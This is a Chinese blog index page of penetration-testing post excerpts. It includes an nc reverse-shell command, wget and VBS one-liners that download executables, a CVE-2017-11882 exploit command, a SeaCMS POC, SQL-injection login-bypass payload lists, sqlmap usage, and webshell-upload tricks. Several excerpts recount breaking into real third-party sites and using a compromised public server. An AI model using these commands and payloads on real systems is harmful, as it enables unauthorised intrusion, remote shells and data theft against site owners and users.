自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(28)
  • 收藏
  • 关注

原创 新博客

http://hone.cool

2018-03-19 17:20:30 312 1

原创 高版本的udf提权

最近一直在学习技术,虽然过程中遇到了些问题,但都解决了。下面就记录一些吧,给自己老年的时候看,哈哈哈。--怀着一颗低调的心奋发前行。配置环境:phpstudy(mysql5.5.53版本)  2012R2 64位首先访问脚本,是款暗月的mysql全版本通杀提权神器,网上找的。需要输入mysql数据库帐号密码,因为我是本地搭建的,所以帐号密码都是root(具体实战,就要自己去想办法找数据库帐号密码了...

2018-02-08 11:41:36 6534 1

原创 通过注入拿下服务器

   首先,碰到了个站。注入漏洞,看一下是不是DBA权限。 当前用户是DBA权限,执行os-shell   可以直接执行命令,但是有时候会卡到链接超时,在执行os-shell的过程中有条信息,就是上面打红的地方(忽略掉打码技术),访问该地址它。   能直接上传文件,上传NC,反弹shell(sqlmap里shell实在卡得不行,回显太慢)...

2017-12-28 14:58:49 2784 1

原创 CVE-2017-11882复现

目标机:win7 office2013 (192.168.72.129)攻击机:kali (192.168.72.139)利用脚本工具:https://github.com/starnightcyber/CVE-2017-11882复现0x01:使用在上述的工具,生成漏洞的doc文件。python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe"...

2017-11-22 15:23:58 872

原创 内网渗透之MSF 路由转发

    如果我已经拿到了一台内网服务器,需要使用MSF去访问内网资源,这时候就需要在msf中添加去往“内网网段”的路由。     MSF跳板实现过程:            需要获得一个msf的session会话;            获取内网地址网段;            在msf中添加”内网网段“的路由;            获取内网网段地址:           例如:meterpre...

2017-11-22 11:24:22 8674

原创 海洋CMS复现

使用环境:肉鸡服务器:103.229.126.201攻击机:win7(192.168.72.130)目标机:win7(192.168.72.129)+(seacms v6.53)POC:POST /seacms/upload/search.php HTTP/1.1Host: 192.168.72.129User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; ...

2017-11-08 14:38:02 2322

原创 某站登入框存在post注入

验证方法,在账号密码处输入' 如果报错说明有该漏洞存在。用burp抓包,具体怎么做,之前博客里有: http://blog.csdn.net/qq_36512966/article/details/70976527然后用sqlmap跑包。命令为:sqlmap -r “包的地址”如图,成功注入。是sa权限,而且可以直接仔细--os-shell命令,离内网已经很近了。...

2017-09-29 11:13:36 2020

原创 通过cmd上传文件的方法-debug方法

测试机:xp(32位)工具:exe2bat.exe 位于kali中的 /usr/share/windows-binaries目录原理:将需要上传的程序转换为十六进制hex的形式,然后debug将hex编译还原。如图:执行命令:wine exe2bat.exe ew.exe ew.txt           最后得到一个ew.txt 将里面的代码复制粘贴到测试机的cmd命令下。注:这是一种比较老的方...

2017-09-28 11:58:06 1476

原创 通过cmd上传文件的方法-wget方法

测试机:win2003(win系统都可以,不一一举例)工具:wget.exe用法cmd下wget.exe http://www.xxx.com/xxx -O c:/windows/xxx(本地保存路径)如图:OK,上传成功。其实这个方法比较多余, 因为在拿到shell之后想办法传程序上去,wget.exe是第三方程序作用也是传程序,你有办法传wget.exe上去,就可以传别的,根本用不着wget....

2017-09-27 17:25:29 6349

原创 通过cmd上传文件的方法-vbs脚本

测试机:win2003 (win2008 xp 都行,不一一举例了,但是也有局限性,win7以上的大部分版本就运行不成功)很简单,复制粘贴代码即可:cmd下:echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://xxx/xxx/wget.exe^",0:xPost.Send():Set sG...

2017-09-27 16:33:02 979

原创 nc的使用

攻击机:kali  192.168.72.128目标机:win2003 192.168.72.131首先在攻击机监听本地端口7777nc -lvvp 77771在目标机上运行nc.exenc.exe 192.168.72.128 7777 -e c:\windows\system32\cmd.exe在看下攻击机里,OK 成功反弹了shell...

2017-09-27 15:52:17 564

原创 ISCC2017 Web write up

一打开连接:注意You give me f1ag and I will give you flag too~~~这段话有猫腻,没错就是f1ag和flag。提交f1ag。出现:哼,就给我一个flag我才不和你换呢。右建查看元素。发现有个输入框被隐藏了,把type=”hidden”改为type=””.出

2017-05-25 13:37:59 1557

原创 ISCC2017 Misc write up附件题目文件

一打开附件是个.docx文档,打开是乱码。改后缀名为.zip打开发现:都是.xml配置文件,找到document.xml时出现flag。二打开附件是个.pcapng文件。用wireshark打开。发现是个tcp协议,追踪TCP流。有个key.zip和test.key(rsa私钥)。将TCP流中的rsa私钥复制到文本

2017-05-25 13:09:01 2925

原创 ISCC2017 Basic write up附加题目文件

Wheel Cipher身为二战时期的密码专家,你截获了通信员身上的一段密文、密钥序列和加密列表。你能看懂吗?加密表:1: 2: 3: 4: 5: 6: 7: 8: 9: 10: 11:12:13: 密钥为:2,3,7,5,13,12,9,1,8,10,4,11,6密文为:NFQKSEVOQOFNP题目已经提示你了,W

2017-05-25 12:51:13 3964

原创 sqlmap的tamper问题

每次日站时,看见安全狗都失望完!所有接下来分析过滤系统到底过滤了哪些参数,该如何绕过。sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。所以有的时候我们会发现,注入成功了但是dump不

2017-05-24 21:28:09 1513

原创 sqlmap常用命令

-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “” #指定数据库名-T “” #指定表名-C “” #指定字段-s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log”  恢复:-s “xx.log” –resume)–colum

2017-05-24 21:05:03 498

原创 htaccess文件上传拿shell

1.创建htaccess文件,编辑内容为:SetHandler application/x-httpd-php然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。2.编辑内容为: demo.jpg> ForceType application/x-httpd-php SetHandler application/x-httpd-php 指定文件名的

2017-05-24 20:50:58 6006

原创 渗透之信息收集

在渗透测试开始之前,第一步信息收集,对网站的结构有个初步了解,第二步才是扫目录。那么,信息收集包括哪方面呢,主要是:IP地址,端口,脚本类型,搭建环境,whois查询等。例如目标网站:http://www.bplead.com/ 查询SEO:可见,权重为0,一般的权重为0,1,2,3还是容易日的,大于3的直接pass,但是你厉害的话,可以忽略这话。IP地址为:123

2017-05-24 12:21:30 620

原创 后台登入万能密码合集

asp aspx万能密码  1: "or "a"="a   2: ')or('a'='a   3:or 1=1--   4:'or 1=1--   5:a'or' 1=1--   6: "or 1=1--   7:'or'a'='a   8: "or"="a'='a   9:'or''='   10:'or'='or'   11: 1 or '1

2017-05-24 11:29:09 21347

转载 xss妙用,快速测试xss漏洞。

#介绍# 这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录:http://ha.ckers.org/xss.html 。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the XSS (Cross Site Scripting) Prevention Cheat Shee

2017-05-24 11:21:39 13980

原创 phpstudy搭建DVWA

首先下载phpstudy和DVWA。http://www.phpstudy.net/http://www.dvwa.co.uk/将DVWA解压后复制到phpstudy目录下的WWW目录。如图用记事本打开DVWA/config/config.inc.php文件,修改密码。保存。访问地址http://127.0.0.1/DVWA/setup.php,点击

2017-04-30 21:15:34 15412 10

原创 文件包含拿webshell

本实验的目的:如何在杀软软件防范下绕过检测上传大马。   新建一个记事本,内容为 命名为:1.asp将我们的大马.asp改名为:123.jpg          将上述的1.asp和123.jpg上传到菜刀里接下来,访问1.aspOK,成功执行大马。注:这段代码意思是包含一个文件,名为:123.jpg。当我们访问1.asp的时候,123.

2017-04-30 14:48:36 3751

原创 记Fck编辑器拿shell

那天同学的QQ被黑发来的挂马网站手贱看了下。用御剑扫描了一下。有FCK编辑器。但御剑扫出的url访问的页面不正常。于是在网上查了查关于FCK编辑器的路径。fckeditor/editor/filemanager/browser/default/browser.html?typeall&connector=connectors/aspx/connector.a

2017-04-29 17:31:15 3800

原创 通过后台登入界面拿到管理员帐号密码-post注入

post注入主要针对登入界面。一.第一种方法就是利用sqlmap自动填写表单.命令:sqlmap.py –u”www.xxx.com/xxx/login.asp“ --forms一般情况下一路回车二.第二种利用brupsite抓包,在用sqlmap –r 命令然后打开sqlmap 输入命令:sqlmap.py –r 将刚才保存的文本拖进去中执行。

2017-04-29 17:21:37 7574

原创 cookie中转注入,使用sqlmap中转注入

一,判断是否有cookie注入:目标网站http://www.xxx.com/x.asp?id=11.在IE浏览器访问去掉参数(id=1)的url: http://www.xxx.com/x.asp?(加载页面,显示不正常,原因是没有输参数)。2.在IE浏览器输入javascript:alert(document.cookie="id="+escape("1"));(添加cookie信息),再次访...

2017-04-29 17:04:33 7330

原创 Filetype修改上传

产生条件:上传点只对文件上传类型及大小判断(没验证文件后缀),此时就可以改Filetype绕过上传。JPG文件后缀自带的typePhp文件后缀自带的type(这时是不允许上传的)然后将php的文件类型替换成jpg的文件类型。 即可绕过上传

2017-04-29 16:56:50 569

原创 access注入及工具使用

Access数据结构: Access数据库          表名                列名                     数据Access注入:  首先判断是否有注入点:  http://www.xxx.com/xxx.asp?id=166’(页面返回错误)http://www.xxx.com/xxx.asp?id=166and 1=1(页面返

2017-04-29 16:51:46 1049

原创 搭建平台区别

专业搭建平台iis Apache uginx tomcat简单的搭建软件       Phpstudy Apmserv 小旋风搭建平台和搭建软件区别功能性区别会影响到我们渗透的方法如:提权 搭建平台权限设置严格 搭建软件权限设置宽松。

2017-04-29 16:35:44 765

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除